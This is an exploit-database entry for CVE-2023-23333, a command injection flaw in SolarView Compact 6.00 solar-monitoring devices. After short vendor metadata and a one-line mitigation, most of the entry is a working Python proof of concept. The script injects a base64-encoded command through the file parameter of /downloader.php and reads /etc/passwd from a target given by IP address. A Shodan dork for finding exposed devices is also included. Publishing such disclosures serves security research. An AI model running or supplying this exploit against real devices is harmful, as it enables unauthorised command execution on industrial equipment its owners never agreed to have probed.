SolarView Compact 6.00 - Command Injection

vendor:

SolarView Compact

by:

ByteHunter

8.1

CVSS

CRITICAL

Command Injection

CWE

Product Name: SolarView Compact

Affected Version From: 6

Affected Version To: 6

Patch Exists: NO

Related CWE: CVE-2023-23333

CPE: a:solarview:compact:6.00

Metasploit:

Other Scripts:

Platforms Tested:

SolarView Compact 6.00 – Command Injection

SolarView Compact 6.00 allows remote attackers to execute arbitrary commands via a crafted HTTP request to the /downloader.php file. This vulnerability has been assigned CVE-2023-23333.

Mitigation:

Ensure input validation and sanitization in the application to prevent command injections. Regularly update to the latest version to patch known vulnerabilities.

Source

Exploit-DB raw data:

#- Exploit Title: SolarView Compact 6.00 - Command Injection
#- Shodan Dork: http.html:"solarview compact"
#- Exploit Author: ByteHunter
#- Email: 0xByteHunter@proton.me
#- Version: 6.00
#- Tested on: 6.00
#- CVE : CVE-2023-23333


import argparse
import requests

def vuln_check(ip_address, port):
    url = f"http://{ip_address}:{port}/downloader.php?file=;echo%20Y2F0IC9ldGMvcGFzc3dkCg%3D%3D|base64%20-d|bash%00.zip"
    response = requests.get(url)
    if response.status_code == 200:
        output = response.text
        if "root" in output:
            print("Vulnerability detected: Command Injection possible.")
            print(f"passwd file content:\n{response.text}")


        else:
            print("No vulnerability detected.")
    else:
        print("Error: Unable to fetch response.")

def main():
    parser = argparse.ArgumentParser(description="SolarView Compact Command Injection ")
    parser.add_argument("-i", "--ip", help="IP address of the target device", required=True)
    parser.add_argument("-p", "--port", help="Port of the the target device (default: 80)", default=80, type=int)
    args = parser.parse_args()
    
    ip_address = args.ip
    port = args.port
    vuln_check(ip_address, port)

if __name__ == "__main__":
    main()